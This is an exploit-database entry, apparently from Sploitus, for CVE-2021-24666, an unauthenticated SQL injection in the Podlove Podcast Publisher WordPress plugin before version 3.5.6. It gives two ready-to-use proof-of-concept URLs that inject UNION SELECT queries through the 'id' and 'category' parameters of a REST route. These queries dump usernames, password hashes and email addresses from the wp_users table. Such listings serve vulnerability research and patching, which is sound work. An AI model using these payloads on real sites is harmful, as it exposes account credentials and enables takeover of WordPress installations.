Exploit for Podlove Podcast Publisher < 3.5.6 - Unauthenticated SQL Injection CVE-2021-24666

Name: Exploit for Podlove Podcast Publisher < 3.5.6 - Unauthenticated SQL Injection CVE-2021-24666
Rating: 5 (297 reviews)

2021-08-24 | CVSS 6.8

## https://sploitus.com/exploit?id=WPEX-ID:FB4D7988-60FF-4862-96A1-80B1866336FE
With the 'Social & Donations' module of the plugin activated.

Permalink Setting: Plain

PoC with payload in id param:
/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23

PoC with payload in category param:
/index.php?rest_route=/podlove/v1/social/services/contributor/1&category=1')+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23